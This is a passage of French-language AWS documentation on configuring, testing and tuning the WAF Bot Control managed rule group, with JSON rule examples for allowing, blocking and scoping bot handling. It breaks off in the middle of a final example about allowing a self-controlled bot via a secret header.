 Cette section fournit des exemples de situations dans lesquelles vous pourriez rencontrer des faux positifs avec AWS WAF Bot Control.

Nous avons soigneusement sélectionné les règles du groupe de règles géré par AWS WAF Bot Control afin de minimiser les faux positifs. Nous testons les règles par rapport au trafic mondial et surveillons leur impact sur les packs de protection des tests (Web ACLs). Cependant, il est toujours possible d'obtenir des faux positifs en raison de modifications des modèles de trafic. En outre, certains cas d'utilisation sont connus pour provoquer des faux positifs et nécessiteront une personnalisation spécifique à votre trafic Web. 

Les situations dans lesquelles vous pourriez rencontrer des faux positifs sont les suivantes : 
+ Les applications mobiles ont généralement des agents utilisateurs autres que le navigateur, que la `SignalNonBrowserUserAgent` règle bloque par défaut. Si vous attendez du trafic provenant d'applications mobiles ou de tout autre trafic légitime impliquant des agents utilisateurs autres que les navigateurs, vous devez ajouter une exception pour l'autoriser. 
+ Vous pouvez vous fier à un trafic de bots spécifique pour des tâches telles que la surveillance de la disponibilité, les tests d'intégration ou les outils marketing. Si Bot Control identifie et bloque le trafic de bots que vous souhaitez autoriser, vous devez modifier le traitement en ajoutant vos propres règles. Bien qu'il ne s'agisse pas d'un scénario faussement positif pour tous les clients, si c'est pour vous, vous devrez le gérer de la même manière que pour un faux positif. 
+ Le groupe de règles géré par Bot Control vérifie les robots à l'aide des adresses IP provenant de AWS WAF. Si vous utilisez Bot Control et que vous avez vérifié les bots qui acheminent via un proxy ou un équilibreur de charge, vous devrez peut-être les autoriser explicitement à l'aide d'une règle personnalisée. Pour plus d'informations sur la création d'une règle personnalisée de ce type, consultez[Utilisation des adresses IP transférées dans AWS WAF](waf-rule-statement-forwarded-ip-address.md). 
+ Une règle de contrôle des bots présentant un faible taux global de faux positifs peut avoir un impact important sur des appareils ou des applications spécifiques. Par exemple, lors des tests et de la validation, nous n'avons peut-être pas observé de demandes provenant d'applications à faible volume de trafic ou de navigateurs ou d'appareils moins courants. 
+ Une règle de contrôle des robots dont le taux de faux positifs est historiquement bas peut avoir augmenté le nombre de faux positifs pour le trafic valide. Cela peut être dû à de nouveaux modèles de trafic ou à de nouveaux attributs de demande qui apparaissent avec un trafic valide, ce qui l'amène à correspondre à la règle alors qu'il ne le faisait pas auparavant. Ces modifications peuvent être dues à des situations telles que les suivantes :
  + Détails du trafic qui sont modifiés lorsque le trafic passe par des appareils réseau, tels que les équilibreurs de charge ou les réseaux de distribution de contenu (CDN).
  + Changements émergents dans les données de trafic, par exemple de nouveaux navigateurs ou de nouvelles versions de navigateurs existants.

Pour plus d'informations sur la façon de gérer les faux positifs que vous pourriez obtenir du groupe de règles géré par AWS WAF Bot Control, consultez les instructions de la section suivante,[Tester et déployer AWS WAF Bot Control](waf-bot-control-deploying.md).

# Tester et déployer AWS WAF Bot Control
<a name="waf-bot-control-deploying"></a>

Cette section fournit des conseils généraux pour configurer et tester une implémentation de AWS WAF Bot Control pour votre site. Les étapes spécifiques que vous choisirez de suivre dépendront de vos besoins, de vos ressources et des demandes Web que vous recevrez. 

Ces informations s'ajoutent aux informations générales sur les tests et le réglage fournies sur[Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
AWS Les règles gérées sont conçues pour vous protéger contre les menaces Web les plus courantes. Lorsqu'ils sont utilisés conformément à la documentation, les groupes de règles AWS gérées ajoutent un niveau de sécurité supplémentaire à vos applications. Cependant, les groupes de règles AWS gérées ne sont pas destinés à remplacer vos responsabilités en matière de sécurité, qui sont déterminées par les AWS ressources que vous sélectionnez. Reportez-vous au [modèle de responsabilité partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) pour vous assurer que vos ressources AWS sont correctement protégées. 

**Risque lié au trafic de production**  
Avant de déployer votre implémentation Bot Control pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. 

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. 

**Pour configurer et tester une implémentation de Bot Control**

Effectuez ces étapes d'abord dans un environnement de test, puis en production.

1. 

**Ajouter le groupe de règles géré par Bot Control**
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

   Ajoutez le groupe de AWS règles géré `AWSManagedRulesBotControlRuleSet` à un pack de protection (ACL Web) nouveau ou existant et configurez-le de manière à ce qu'il ne modifie pas le comportement actuel du pack de protection (ACL Web). 
   + Lorsque vous ajoutez le groupe de règles géré, modifiez-le et procédez comme suit : 
     + Dans le volet **Niveau d'inspection**, sélectionnez le niveau d'inspection que vous souhaitez utiliser. 
       + **Fréquent** : détecte une variété de robots auto-identifiables, tels que les frameworks de scraping Web, les moteurs de recherche et les navigateurs automatisés. Les protections Bot Control à ce niveau identifient les robots courants à l'aide de techniques de détection de bots traditionnelles, telles que l'analyse statique des données des demandes. Les règles étiquettent le trafic provenant de ces robots et bloquent ceux qu'ils ne peuvent pas vérifier. 
       + **Ciblé** : inclut les protections de niveau commun et ajoute une détection ciblée pour les robots sophistiqués qui ne s'identifient pas eux-mêmes. Des protections ciblées atténuent l'activité des robots en combinant la limitation du débit, le CAPTCHA et les défis liés au navigateur en arrière-plan. 
         + **`TGT_`**— Les règles qui fournissent une protection ciblée portent des noms commençant par`TGT_`. Toutes les protections ciblées utilisent des techniques de détection telles que l'interrogation du navigateur, la prise d'empreintes digitales et l'heuristique comportementale pour identifier le trafic de bots défectueux. 
         + **`TGT_ML_`**— Les règles de protection ciblées qui utilisent l'apprentissage automatique portent des noms commençant par`TGT_ML_`. Ces règles utilisent une analyse automatisée par apprentissage automatique des statistiques de trafic du site Web pour détecter les comportements anormaux indiquant une activité distribuée et coordonnée des bots. AWS WAF analyse les statistiques relatives au trafic de votre site Web, telles que les horodatages, les caractéristiques du navigateur et les URL précédemment visitées, afin d'améliorer le modèle d'apprentissage automatique de Bot Control. Les fonctionnalités d'apprentissage automatique sont activées par défaut, mais vous pouvez les désactiver dans la configuration de votre groupe de règles. Lorsque l'apprentissage automatique est désactivé, AWS WAF n'évalue pas ces règles. 

       Pour plus d'informations sur ce choix, consultez[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). 
     + Dans le volet **Règles**, ouvrez le menu déroulant **Remplacer toutes les actions des règles** et choisissez. **Count** Avec cette configuration, AWS WAF évalue les demandes par rapport à toutes les règles du groupe de règles et ne compte que les correspondances qui en résultent, tout en ajoutant des étiquettes aux demandes. Pour de plus amples informations, veuillez consulter [Remplacer les actions des règles dans un groupe de règles](web-acl-rule-group-settings.md#web-acl-rule-group-rule-action-override).

       Grâce à cette dérogation, vous pouvez surveiller l'impact potentiel des règles de contrôle des bots sur votre trafic, afin de déterminer si vous souhaitez ajouter des exceptions pour des éléments tels que les cas d'utilisation internes ou les robots souhaités. 
   + Positionnez le groupe de règles de manière à ce qu'il soit évalué en dernier dans le pack de protection (ACL Web), avec un paramètre de priorité numériquement supérieur à celui des autres règles ou groupes de règles que vous utilisez déjà. Pour de plus amples informations, veuillez consulter [Définition de la priorité des règles](web-acl-processing-order.md). 

     De cette façon, votre gestion actuelle du trafic n'est pas perturbée. Par exemple, si vous avez des règles qui détectent le trafic malveillant tel que l'injection SQL ou les scripts intersites, elles continueront à détecter et à enregistrer ces demandes. Par ailleurs, si vous avez des règles qui autorisent le trafic connu non malveillant, elles peuvent continuer à autoriser ce trafic, sans qu'il soit bloqué par le groupe de règles géré par Bot Control. Vous pouvez décider d'ajuster l'ordre de traitement lors de vos activités de test et de réglage, mais c'est une bonne façon de commencer.

1. 

**Activer la journalisation et les métriques pour le pack de protection (ACL Web)**

   Le cas échéant, configurez la journalisation, la collecte de données Amazon Security Lake, l'échantillonnage des demandes et CloudWatch les métriques Amazon pour le pack de protection (ACL Web). Vous pouvez utiliser ces outils de visibilité pour surveiller l'interaction du groupe de règles géré par Bot Control avec votre trafic. 
   + Pour plus d’informations sur la journalisation, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 
   + Pour plus d'informations sur Amazon Security Lake, consultez [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) et [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) décrits dans le *guide de l'utilisateur d'Amazon Security Lake*. 
   + Pour plus d'informations sur CloudWatch les métriques Amazon, consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 
   + Pour plus d'informations sur l'échantillonnage des requêtes Web, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

1. 

**Associer le pack de protection (ACL Web) à une ressource**

   Si le pack de protection (ACL Web) n'est pas déjà associé à une ressource, associez-le. Pour plus d'informations, consultez [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md).

1. 

**Surveillez le trafic et les correspondances aux règles du Bot Control**

   Assurez-vous que le trafic circule et que les règles du groupe de règles géré par Bot Control ajoutent des étiquettes aux requêtes Web correspondantes. Vous pouvez voir les étiquettes dans les journaux et voir les statistiques relatives aux robots et aux étiquettes dans les CloudWatch statistiques Amazon. Dans les journaux, les règles que vous avez remplacées pour être prises en compte dans le groupe de règles apparaissent dans le `ruleGroupList` champ « `action` set to count » et `overriddenAction` indiquent l'action de règle configurée que vous avez remplacée.
**Note**  
Le groupe de règles géré par Bot Control vérifie les robots à l'aide des adresses IP provenant de AWS WAF. Si vous utilisez Bot Control et que vous avez vérifié les bots qui acheminent via un proxy ou un équilibreur de charge, vous devrez peut-être les autoriser explicitement à l'aide d'une règle personnalisée. Pour plus d'informations sur la création d'une règle personnalisée, consultez[Utilisation des adresses IP transférées dans AWS WAF](waf-rule-statement-forwarded-ip-address.md). Pour plus d'informations sur la façon dont vous pouvez utiliser la règle pour personnaliser le traitement des requêtes Web par Bot Control, reportez-vous à l'étape suivante. 

   Examinez attentivement le traitement des requêtes Web pour détecter tout faux positif que vous pourriez avoir besoin d'atténuer grâce à un traitement personnalisé. Pour des exemples de faux positifs, voir[Exemples de scénarios de faux positifs avec AWS WAF Bot Control](waf-bot-control-false-positives.md).

1. 

**Personnalisation de la gestion des requêtes Web par Bot Control**

   Le cas échéant, ajoutez vos propres règles qui autorisent ou bloquent explicitement les demandes, afin de modifier la façon dont les règles de contrôle des bots les traiteraient autrement. 

   La manière de procéder dépend de votre cas d'utilisation, mais les solutions les plus courantes sont les suivantes :
   + Autorisez explicitement les demandes avec une règle que vous ajoutez avant le groupe de règles géré par Bot Control. Ainsi, les demandes autorisées n'atteignent jamais le groupe de règles pour être évaluées. Cela peut aider à réduire les coûts liés à l'utilisation du groupe de règles géré par Bot Control. 
   + Excluez les demandes de l'évaluation de Bot Control en ajoutant une instruction scope-down dans l'instruction du groupe de règles géré par Bot Control. Cela fonctionne de la même manière que l'option précédente. Cela peut aider à réduire les coûts liés à l'utilisation du groupe de règles géré par Bot Control, car les demandes qui ne correspondent pas à l'instruction scope-down ne sont jamais évaluées par le groupe de règles. Pour plus d'informations sur les instructions de portée réduite, consultez. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md) 

     Pour obtenir des exemples relatifs à , consultez les rubriques suivantes : 
     + [Exclure la plage d'adresses IP de la gestion des robots](waf-bot-control-example-scope-down-ip.md)
     + [Autoriser le trafic provenant d'un bot que vous contrôlez](waf-bot-control-example-scope-down-your-bot.md)
   + Utilisez les étiquettes Bot Control dans le traitement des demandes pour autoriser ou bloquer les demandes. Ajoutez une règle de correspondance des libellés après le groupe de règles géré par Bot Control pour filtrer les demandes étiquetées que vous souhaitez autoriser de celles que vous souhaitez bloquer. 

     Après le test, maintenez les règles de contrôle des robots associées en mode décompte et conservez les décisions relatives au traitement des demandes dans votre règle personnalisée. Pour plus d'informations sur les déclarations de correspondance des étiquettes, voir[Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md). 

     Pour des exemples de ce type de personnalisation, consultez les pages suivantes : 
     + [Création d'une exception pour un agent utilisateur bloqué](waf-bot-control-example-user-agent-exception.md)
     + [Autoriser un bot bloqué spécifique](waf-bot-control-example-allow-blocked-bot.md)
     + [Blocage des robots vérifiés](waf-bot-control-example-block-verified-bots.md)

   Pour accéder à des exemples supplémentaires, consultez [AWS WAF Exemples de Bot Control](waf-bot-control-examples.md).

1. 

**Si nécessaire, activez les paramètres du groupe de règles géré par Bot Control**

   En fonction de votre situation, vous avez peut-être décidé de laisser certaines règles de contrôle des bots en mode décompte ou de les remplacer par une autre action. Pour les règles que vous souhaitez exécuter telles qu'elles sont configurées dans le groupe de règles, activez la configuration des règles standard. Pour ce faire, modifiez l'énoncé du groupe de règles dans votre pack de protection (ACL Web) et apportez vos modifications dans le volet **Règles**. 

# AWS WAF Exemples de Bot Control
<a name="waf-bot-control-examples"></a>

Cette section présente des exemples de configurations qui répondent à divers cas d'utilisation courants pour les implémentations de AWS WAF Bot Control. 

Chaque exemple fournit une description du cas d'utilisation, puis montre la solution dans les listes JSON pour les règles configurées personnalisées. 

**Note**  
Les listes JSON présentées dans ces exemples ont été créées dans la console en configurant la règle, puis en la modifiant à l'aide de l'**éditeur Rule JSON**. 

**Topics**
+ [Exemple de contrôle des robots : configuration simple](waf-bot-control-example-basic.md)
+ [Exemple de contrôle des bots : autorisation explicite des robots vérifiés](waf-bot-control-example-allow-verified-bots.md)
+ [Exemple de contrôle des bots : blocage des robots vérifiés](waf-bot-control-example-block-verified-bots.md)
+ [Exemple de contrôle des bots : autorisation d'un bot bloqué spécifique](waf-bot-control-example-allow-blocked-bot.md)
+ [Exemple de contrôle des bots : création d'une exception pour un agent utilisateur bloqué](waf-bot-control-example-user-agent-exception.md)
+ [Exemple de Bot Control : utilisation du Bot Control uniquement pour la page de connexion](waf-bot-control-example-scope-down-login.md)
+ [Exemple de contrôle des robots : utilisation du contrôle des robots uniquement pour le contenu dynamique](waf-bot-control-example-scope-down-dynamic-content.md)
+ [Exemple de contrôle des bots : exclusion d'une plage d'adresses IP de la gestion des bots](waf-bot-control-example-scope-down-ip.md)
+ [Exemple de contrôle des bots : autorisation du trafic provenant d'un bot que vous contrôlez](waf-bot-control-example-scope-down-your-bot.md)
+ [Exemple de contrôle des bots : activation d'un niveau d'inspection ciblé](waf-bot-control-example-targeted-inspection-level.md)
+ [Exemple de contrôle des robots : utilisation de deux instructions pour limiter l'utilisation du niveau d'inspection ciblé](waf-bot-control-example-common-and-targeted-inspection-level.md)

# Exemple de contrôle des robots : configuration simple
<a name="waf-bot-control-example-basic"></a>

La liste JSON suivante montre un exemple de pack de protection (ACL Web) avec un groupe de règles géré par AWS WAF Bot Control. Notez la configuration de visibilité, qui entraîne le stockage AWS WAF d'échantillons de demandes et de mesures à des fins de surveillance. 

```
{
  "Name": "Bot-WebACL",
  "Id": "...",
  "ARN": "...",
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "Bot-WebACL",
  "Rules": [
      {
        ...
      },
      {
         "Name": "AWS-AWSBotControl-Example",
         "Priority": 5,
         "Statement": {
            "ManagedRuleGroupStatement": {
               "VendorName": "AWS",
               "Name": "AWSManagedRulesBotControlRuleSet",
               "ManagedRuleGroupConfigs": [
                 {
                   "AWSManagedRulesBotControlRuleSet": {
                     "InspectionLevel": "COMMON"
                   }
                 }
               ],
               "RuleActionOverrides": [],
               "ExcludedRules": []
            },
            "VisibilityConfig": {
               "SampledRequestsEnabled": true,
               "CloudWatchMetricsEnabled": true,
               "MetricName": "AWS-AWSBotControl-Example"
             }
          }
      }
    ],
    "VisibilityConfig": {
      ...
    },
    "Capacity": 1496,
    "ManagedByFirewallManager": false,
    "RetrofittedByFirewallManager": false
}
```

# Exemple de contrôle des bots : autorisation explicite des robots vérifiés
<a name="waf-bot-control-example-allow-verified-bots"></a>

AWS WAF Le contrôle des bots ne bloque pas les robots connus AWS pour être des robots courants et vérifiables. Lorsque Bot Control identifie une demande Web comme provenant d'un bot vérifié, il ajoute une étiquette qui nomme le bot et une étiquette qui indique qu'il s'agit d'un bot vérifié. Bot Control n'ajoute aucune autre étiquette, telle que des étiquettes de signaux, afin d'empêcher le blocage des robots connus pour leur bon fonctionnement.

Il se peut que d'autres AWS WAF règles bloquent les robots vérifiés. Si vous souhaitez vous assurer que les robots vérifiés sont autorisés, ajoutez une règle personnalisée pour les autoriser en fonction des étiquettes Bot Control. Votre nouvelle règle doit être exécutée après le groupe de règles géré par Bot Control, afin que les étiquettes puissent être comparées. 

La règle suivante autorise explicitement les robots vérifiés.

```
{
    "Name": "match_rule",
    "Statement": {
      "LabelMatchStatement": {
        "Scope": "LABEL",
        "Key": "awswaf:managed:aws:bot-control:bot:verified"
      }
    },
    "RuleLabels": [],
    "Action": {
      "Allow": {}
    }
}
```

# Exemple de contrôle des bots : blocage des robots vérifiés
<a name="waf-bot-control-example-block-verified-bots"></a>

Pour bloquer les robots vérifiés, vous devez ajouter une règle de blocage qui s'exécute après le groupe de règles géré par AWS WAF Bot Control. Pour ce faire, identifiez les noms des robots que vous souhaitez bloquer et utilisez une instruction label match pour les identifier et les bloquer. Si vous souhaitez simplement bloquer tous les robots vérifiés, vous pouvez omettre la correspondance avec l'`bot:name:`étiquette. 

La règle suivante bloque uniquement le bot `bingbot` vérifié. Cette règle doit être exécutée après le groupe de règles géré par Bot Control.

```
{
    "Name": "match_rule",
    "Statement": {
      "AndStatement": {
        "Statements": [
          {
            "LabelMatchStatement": {
              "Scope": "LABEL",
              "Key": "awswaf:managed:aws:bot-control:bot:name:bingbot"
            }
          },
          {
            "LabelMatchStatement": {
              "Scope": "LABEL",
              "Key": "awswaf:managed:aws:bot-control:bot:verified"
            }
          }
        ]
      }
    },
    "RuleLabels": [],
    "Action": {
      "Block": {}
    }
  }
```

La règle suivante bloque tous les robots vérifiés.

```
{
    "Name": "match_rule",
    "Statement": {
      "LabelMatchStatement": {
        "Scope": "LABEL",
        "Key": "awswaf:managed:aws:bot-control:bot:verified"
      }
    },
    "RuleLabels": [],
    "Action": {
      "Block": {}
    }
}
```

# Exemple de contrôle des bots : autorisation d'un bot bloqué spécifique
<a name="waf-bot-control-example-allow-blocked-bot"></a>

Il est possible qu'un bot soit bloqué par plusieurs règles de contrôle des robots. Exécutez la procédure suivante pour chaque règle de blocage. 

Si une règle de contrôle des AWS WAF bots bloque un robot que vous ne souhaitez pas bloquer, procédez comme suit :

1. Identifiez la règle de contrôle du bot qui bloque le bot en consultant les journaux. La règle de blocage sera spécifiée dans les journaux dans les champs dont le nom commence par`terminatingRule`. Pour plus d'informations sur les journaux du pack de protection (ACL Web), consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). Notez l'étiquette que la règle ajoute aux demandes. 

1. Dans votre pack de protection (ACL Web), remplacez l'action de la règle de blocage pour qu'elle soit prise en compte. Pour ce faire, dans la console, modifiez la règle du groupe de règles dans le pack de protection (ACL Web) et choisissez une action de remplacement Count pour la règle. Cela garantit que le bot n'est pas bloqué par la règle, mais que la règle appliquera toujours son étiquette aux demandes correspondantes. 

1. Ajoutez une règle de correspondance des étiquettes à votre pack de protection (ACL Web), après le groupe de règles géré par Bot Control. Configurez la règle pour qu'elle corresponde à l'étiquette de la règle remplacée et pour bloquer toutes les demandes correspondantes, à l'exception du bot que vous ne souhaitez pas bloquer. 

   Votre pack de protection (ACL Web) est désormais configuré de telle sorte que le bot que vous souhaitez autoriser ne soit plus bloqué par la règle de blocage que vous avez identifiée dans les journaux. 

Vérifiez à nouveau le trafic et vos journaux pour vous assurer que le bot est autorisé à entrer. Si ce n'est pas le cas, réexécutez la procédure ci-dessus.

Supposons, par exemple, que vous souhaitiez bloquer tous les robots de surveillance à l'exception de`pingdom`. Dans ce cas, vous remplacez la `CategoryMonitoring` règle pour compter, puis vous rédigez une règle pour bloquer tous les robots de surveillance, à l'exception de ceux portant le nom du bot. `pingdom` 

La règle suivante utilise le groupe de règles géré par Bot Control mais remplace l'action de la règle pour qu'elle soit prise `CategoryMonitoring` en compte. La règle de surveillance des catégories applique ses étiquettes comme d'habitude aux demandes correspondantes, mais les compte uniquement au lieu d'effectuer son action habituelle de blocage. 

```
{
  "Name": "AWS-AWSBotControl-Example",
  "Priority": 5,
  "Statement": {
    "ManagedRuleGroupStatement": {
      "VendorName": "AWS",
      "Name": "AWSManagedRulesBotControlRuleSet",
      "ManagedRuleGroupConfigs": [
        {
          "AWSManagedRulesBotControlRuleSet": {
            "InspectionLevel": "COMMON"
          }
        }
      ],
	  "RuleActionOverrides": [
        {
          "ActionToUse": {
            "Count": {}
          },
          "Name": "CategoryMonitoring"
        }
      ],
      "ExcludedRules": []
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "AWS-AWSBotControl-Example"
  }
}
```

La règle suivante correspond à l'étiquette de surveillance des catégories que la `CategoryMonitoring` règle précédente ajoute aux requêtes Web correspondantes. Parmi les demandes de surveillance des catégories, cette règle bloque toutes sauf celles dont le nom du bot est étiqueté`pingdom`. 

La règle suivante doit être exécutée après le groupe de règles géré par Bot Control précédent dans l'ordre de traitement du pack de protection (ACL Web). 

```
{
      "Name": "match_rule",
      "Priority": 10,
      "Statement": {
        "AndStatement": {
          "Statements": [
            {
              "LabelMatchStatement": {
                "Scope": "LABEL",
                "Key": "awswaf:managed:aws:bot-control:bot:category:monitoring"
              }
            },
            {
              "NotStatement": {
                "Statement": {
                  "LabelMatchStatement": {
                    "Scope": "LABEL",
                    "Key": "awswaf:managed:aws:bot-control:bot:name:pingdom"
                  }
                }
              }
            }
          ]
        }
      },
      "Action": {
        "Block": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "match_rule"
      }
}
```

# Exemple de contrôle des bots : création d'une exception pour un agent utilisateur bloqué
<a name="waf-bot-control-example-user-agent-exception"></a>

Si le trafic provenant de certains agents utilisateurs autres que le navigateur est bloqué par erreur, vous pouvez créer une exception en définissant la règle `SignalNonBrowserUserAgent` de contrôle des AWS WAF bots incriminée sur Nombre, puis en combinant l'étiquetage de la règle avec vos critères d'exception. 

**Note**  
Les applications mobiles ont généralement des agents utilisateurs autres que le navigateur, que la `SignalNonBrowserUserAgent` règle bloque par défaut. 

La règle suivante utilise le groupe de règles géré par Bot Control mais remplace l'action de règle pour `SignalNonBrowserUserAgent` to Count. La règle du signal applique ses étiquettes comme d'habitude aux demandes correspondantes, mais les compte uniquement au lieu d'effectuer son action habituelle de blocage. 

```
{
  "Name": "AWS-AWSBotControl-Example",
  "Priority": 5,
  "Statement": {
    "ManagedRuleGroupStatement": {
      "VendorName": "AWS",
      "Name": "AWSManagedRulesBotControlRuleSet",
      "ManagedRuleGroupConfigs": [
        {
          "AWSManagedRulesBotControlRuleSet": {
            "InspectionLevel": "COMMON"
          }
        }
      ],
	  "RuleActionOverrides": [
        {
          "ActionToUse": {
            "Count": {}
          },
          "Name": "SignalNonBrowserUserAgent"
        }
      ],
      "ExcludedRules": []
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "AWS-AWSBotControl-Example"
  }
}
```

La règle suivante correspond à l'étiquette de signal que la `SignalNonBrowserUserAgent` règle Bot Control ajoute à ses requêtes Web correspondantes. Parmi les demandes de signal, cette règle bloque toutes sauf celles qui ont l'agent utilisateur que nous voulons autoriser. 

La règle suivante doit être exécutée après le groupe de règles géré par Bot Control précédent dans l'ordre de traitement du pack de protection (ACL Web). 

```
{
    "Name": "match_rule",
    "Statement": {
      "AndStatement": {
        "Statements": [
          {
            "LabelMatchStatement": {
              "Scope": "LABEL",
              "Key": "awswaf:managed:aws:bot-control:signal:non_browser_user_agent"
            }
          },
          {
            "NotStatement": {
              "Statement": {
                "ByteMatchStatement": {
                  "FieldToMatch": {
                    "SingleHeader": {
                      "Name": "user-agent"
                    }
                  },
                  "PositionalConstraint": "EXACTLY",
                  "SearchString": "PostmanRuntime/7.29.2",
                  "TextTransformations": [
                    {
                      "Priority": 0,
                      "Type": "NONE"
                    }
                  ]
                }
              }
            }
          }
        ]
      }
    },
    "RuleLabels": [],
    "Action": {
      "Block": {}
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "match_rule"
    }
}
```

# Exemple de Bot Control : utilisation du Bot Control uniquement pour la page de connexion
<a name="waf-bot-control-example-scope-down-login"></a>

L'exemple suivant utilise une instruction scope-down pour appliquer le contrôle des AWS WAF robots uniquement au trafic arrivant sur la page de connexion d'un site Web, qui est identifiée par le chemin de l'URI. `login` Le chemin de l'URI vers votre page de connexion peut être différent de celui indiqué dans l'exemple, en fonction de votre application et de votre environnement.

```
{
  "Name": "AWS-AWSBotControl-Example",
  "Priority": 5,
  "Statement": {
    "ManagedRuleGroupStatement": {
      "VendorName": "AWS",
      "Name": "AWSManagedRulesBotControlRuleSet",
	  "ManagedRuleGroupConfigs": [
        {
          "AWSManagedRulesBotControlRuleSet": {
            "InspectionLevel": "COMMON"
          }
        }
      ],
      "RuleActionOverrides": [],
      "ExcludedRules": []
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "AWS-AWSBotControl-Example"
    },
    "ScopeDownStatement": {
      "ByteMatchStatement": {
        "SearchString": "login",
        "FieldToMatch": {
          "UriPath": {}
        },
        "TextTransformations": [
          {
            "Priority": 0,
            "Type": "NONE"
          }
        ],
        "PositionalConstraint": "CONTAINS"
      }
    }
  }
}
```

# Exemple de contrôle des robots : utilisation du contrôle des robots uniquement pour le contenu dynamique
<a name="waf-bot-control-example-scope-down-dynamic-content"></a>

Cet exemple utilise une instruction scope-down pour appliquer le contrôle des AWS WAF robots uniquement au contenu dynamique. 

L'instruction scope-down exclut le contenu statique en annulant les résultats de correspondance pour un ensemble de modèles regex : 
+ L'ensemble de modèles regex est configuré pour correspondre aux extensions de *contenu statique*. Par exemple, la spécification du jeu de modèles regex peut être`(?i)\.(jpe?g|gif|png|svg|ico|css|js|woff2?)$`. Pour plus d'informations sur les ensembles de modèles et les instructions regex, consultez[Instruction de correspondance d'ensemble de modèles d'expression régulière de règle](waf-rule-statement-type-regex-pattern-set-match.md). 
+ Dans l'instruction scope-down, nous excluons le contenu statique correspondant en imbriquant l'instruction regex pattern set dans une instruction. `NOT` Pour plus d'informations sur `NOT` cette déclaration, voir[NOTdéclaration de règle](waf-rule-statement-type-not.md).

```
{
  "Name": "AWS-AWSBotControl-Example",
  "Priority": 5,
  "Statement": {
    "ManagedRuleGroupStatement": {
      "VendorName": "AWS",
      "Name": "AWSManagedRulesBotControlRuleSet",
	  "ManagedRuleGroupConfigs": [
        {
          "AWSManagedRulesBotControlRuleSet": {
            "InspectionLevel": "COMMON"
          }
        }
      ],
      "RuleActionOverrides": [],
      "ExcludedRules": []
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "AWS-AWSBotControl-Example"
    },
    "ScopeDownStatement": {
      "NotStatement": {
        "Statement": {
          "RegexPatternSetReferenceStatement": {
            "ARN": "arn:aws:wafv2:us-east-1:123456789:regional/regexpatternset/excludeset/00000000-0000-0000-0000-000000000000",
            "FieldToMatch": {
              "UriPath": {}
            },
            "TextTransformations": [
              {
                "Priority": 0,
                "Type": "NONE"
              }
            ]
          }
        }
      }
    }
  }
}
```

# Exemple de contrôle des bots : exclusion d'une plage d'adresses IP de la gestion des bots
<a name="waf-bot-control-example-scope-down-ip"></a>

Si vous souhaitez exclure un sous-ensemble du trafic Web de la gestion de AWS WAF Bot Control et que vous pouvez identifier ce sous-ensemble à l'aide d'une instruction de règle, excluez-le en ajoutant une instruction de portée vers le bas à votre déclaration de groupe de règles géré par Bot Control. 

La règle suivante exécute la gestion normale du bot Bot Control sur l'ensemble du trafic Web, à l'exception des requêtes Web provenant d'une plage d'adresses IP spécifique.

```
{
  "Name": "AWS-AWSBotControl-Example",
  "Priority": 5,
  "Statement": {
    "ManagedRuleGroupStatement": {
      "VendorName": "AWS",
      "Name": "AWSManagedRulesBotControlRuleSet",
      "ManagedRuleGroupConfigs": [
        {
          "AWSManagedRulesBotControlRuleSet": {
            "InspectionLevel": "COMMON"
          }
        }
      ],
      "RuleActionOverrides": [],
      "ExcludedRules": []
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "AWS-AWSBotControl-Example"
    },
    "ScopeDownStatement": {
      "NotStatement": {
        "Statement": {
          "IPSetReferenceStatement": {
            "ARN": "arn:aws:wafv2:us-east-1:123456789:regional/ipset/friendlyips/00000000-0000-0000-0000-000000000000"
          }
        }
      }
    }
  }
}
```

# Exemple de contrôle des bots : autorisation du trafic provenant d'un bot que vous contrôlez
<a name="waf-bot-control-example-scope-down-your-bot"></a>

Vous pouvez configurer certains robots de surveillance du site et certains robots personnalisés pour envoyer des en-têtes personnalisés. Si vous souhaitez autoriser le trafic provenant de ces types de robots, vous pouvez les configurer pour ajouter un secret partagé dans un en-tête. Vous pouvez ensuite exclure les messages comportant un en-tête en ajoutant une instruction scope-down à l'instruction du groupe de règles géré par AWS WAF Bot Control. 

L'exemple de règle suivant exclut le trafic avec un en-tête secret de l'inspection Bot Control.

```
{
  "Name": "AWS-AWSBotControl-Example",
  "Priority": 5,
  "Statement": {
